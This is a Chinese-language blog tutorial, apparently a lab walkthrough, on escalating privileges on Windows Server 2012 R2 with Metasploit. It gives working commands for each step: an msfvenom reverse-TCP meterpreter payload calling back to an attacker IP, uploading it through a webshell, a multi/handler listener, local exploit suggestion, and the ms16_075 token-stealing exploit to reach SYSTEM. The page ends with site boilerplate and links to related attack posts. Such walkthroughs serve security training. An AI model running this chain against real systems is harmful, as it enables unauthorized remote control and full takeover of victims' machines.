利用MSF溢出漏洞提权windows server2012

这篇具有很好参考价值的文章主要介绍了利用MSF溢出漏洞提权windows server2012。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

实验内容

使用Kali Linux平台的“metasploit framework”工具,针对Windows2012R2操作系统,上传EXP实现系统提权。
在此之前已经上传一句话取得admin权限,在自己虚拟机做演示,大家通常取得的权限可能会比admin低,但也是可以进行以下提权的,这里要把目标提权至system权限。

实验环境

kalil inux

msf 提权2012漏洞模块,网络安全,Windows,安全

Windows Server 2012 R2
msf 提权2012漏洞模块,网络安全,Windows,安全

开始实验

下载https://github.com/chroblert/WindowsVulnScan
msf 提权2012漏洞模块,网络安全,Windows,安全
使用powershell运行KBCollect.ps,生成KB.json
msf 提权2012漏洞模块,网络安全,Windows,安全
msf 提权2012漏洞模块,网络安全,Windows,安全
修改KB.json编码格式
msf 提权2012漏洞模块,网络安全,Windows,安全
这里我把文档拿到了本机进行测试
执行脚本,可能会报错,pip install requests 下载即可
msf 提权2012漏洞模块,网络安全,Windows,安全
成功执行
msf 提权2012漏洞模块,网络安全,Windows,安全

查看具有公开EXP的CVE

python cve-check.py -C -f KB.json

msf 提权2012漏洞模块,网络安全,Windows,安全
生成反弹后门:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.121.139 LPORT=3333 -f exe -o msf.exe

msf 提权2012漏洞模块,网络安全,Windows,安全
使用蚁剑连接并上传后门程序
msf 提权2012漏洞模块,网络安全,Windows,安全
配置监听会话

msfconsole

msf 提权2012漏洞模块,网络安全,Windows,安全
开启监听

use exploit/multi/handler

msf 提权2012漏洞模块,网络安全,Windows,安全
启动后门
msf 提权2012漏洞模块,网络安全,Windows,安全
成功监听
msf 提权2012漏洞模块,网络安全,Windows,安全
查看当前权限getuid
msf 提权2012漏洞模块,网络安全,Windows,安全
切换出来为后续使用自动漏洞模块做准备

meterpreter > background

msf 提权2012漏洞模块,网络安全,Windows,安全
使用MSF post/multi/recon/local_exploit_suggester模块快速识别系统中可能被利用的漏洞

use post/multi/recon/local_exploit_suggester

msf 提权2012漏洞模块,网络安全,Windows,安全

show options 

msf 提权2012漏洞模块,网络安全,Windows,安全

set showdescription  true

设置会话为1
msf 提权2012漏洞模块,网络安全,Windows,安全
run
msf 提权2012漏洞模块,网络安全,Windows,安全
使用ms16_075令牌窃取提权

use exploit/windows/local/ms16_075_reflection_juicy

msf 提权2012漏洞模块,网络安全,Windows,安全
set session 1
msf 提权2012漏洞模块,网络安全,Windows,安全
run
msf 提权2012漏洞模块,网络安全,Windows,安全
getuid
msf 提权2012漏洞模块,网络安全,Windows,安全
提权成功文章来源地址https://www.toymoban.com/news/detail-819791.html

到了这里,关于利用MSF溢出漏洞提权windows server2012的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Kali Linux利用MSF渗透Windows11电脑

    目录 一、MSF简介 渗透环境 二、渗透流程 1.Kali Linux进入Root模式  2.生成可执行文件 3.运行msfconsole命令  4.配置参数  5.在靶机Windows11打开可执行文件 6.渗透 Msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayloa

    2024年02月06日
    浏览(45)
  • Windows系统内核溢出漏洞提权

    目录  Windows内核溢出漏洞原理 溢出漏洞简介 什么是缓冲区 缓冲区溢出 缓冲区溢出目的 Windows内核溢出漏洞利用流程 提权实战思路 手工提权测试 辅助提权 EXP如何寻找 使用MSF提权 关于提权时可能遇到的问题 如果提权的时候发现无法执行命令的话,可以上传一个cmd.exe到可读

    2024年02月07日
    浏览(38)
  • 内网安全—Windows系统内核溢出漏洞提权

    系统内核溢出漏洞提权         往缓冲区中写入超出限定长度的内容,造成缓冲区溢出,从而破坏程序的堆栈进而运行自己精心准备的指定代码,达到攻击的目的。 分类:         堆溢出         栈溢出 查找补丁的方法          1、手工查找补丁情况      

    2024年02月03日
    浏览(46)
  • 操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权

    系列文章 操作系统权限提升(十二)之绕过UAC提权-Windows UAC概述 注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!! 拿到一个普通管理员的SHELL,在CS中没有*号代表有UAC 执行添加用户的命令时显示拒绝访问 使用CS自带的插件进行绕过提权 直接提到了system权限

    2024年02月16日
    浏览(42)
  • 操作系统权限提升(三)之Windows系统内核溢出漏洞提权

    系列文章 操作系统权限提升(一)之操作系统权限介绍 操作系统权限提升(二)之常见提权的环境介绍 注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!!! 溢出提权是指攻击者利用系统本身或系统中软件的漏洞来获取 Windows操作系统System权限,其中溢出,提权

    2024年02月14日
    浏览(37)
  • msf常用模块功能整理

    更新中 shell中直接输入msfconsole开始运行 use +模块路径 使用模块 search+模块 用来搜索模块 back 返回主界面 模块中: info 查看模块信息 show options 查看模块设置项 show targets 显示可选择的target(targert更像是给你选项,你去细化攻击细节,但是明明目标机器是64位系统,我选

    2024年02月04日
    浏览(55)
  • Kali Linux利用MSF入侵安卓手机

    Kali Linux利用MSF入侵安卓手机 一、什么是msf msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。 演示

    2024年02月10日
    浏览(45)
  • 利用msf进行内网的木马渗透详细教程

    本文仅限学术交流,请勿用他人实践 本文通过kali系统进行内网渗透。主机 ip:172.20.10.14 靶机ip:172.20.10.3(win10)  文章目录 前言 一 准备工作 二 进行渗透 1.开启服务:需要开启apache和postgresql服务 2.制作木马文件,利用msf进行渗透 总结  提示:以下是本篇文章正文内容,下

    2023年04月08日
    浏览(45)
  • 利用MSF打包加固APK对安卓手机进行控制

    由于经典的MSF生成apk安装包控制,版本较低,高版本安卓手机可能会出现版本不支持或无法使用的现象,而且apk无法正常使用,没有图形化界面,比较假。 相比于原始的msf远控,此版本app在进行远控时,被注入的app可以正常运行,原始msf生成的app程序,只在桌面上有一个图标

    2024年01月16日
    浏览(42)
  • Kali之MSF的MS08-067漏洞复现详解

    MSF即Metasploit Framework,是一个综合性的渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具。 目前安装的kali都自带MSF,可以直接在图形界面打开 也可以在kali的终端通过使用命令msfconsole来打开。 1)msf的安装目录: ┌──(kali㉿kali)-[~] └─$ ls /usr/shar

    2023年04月08日
    浏览(52)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包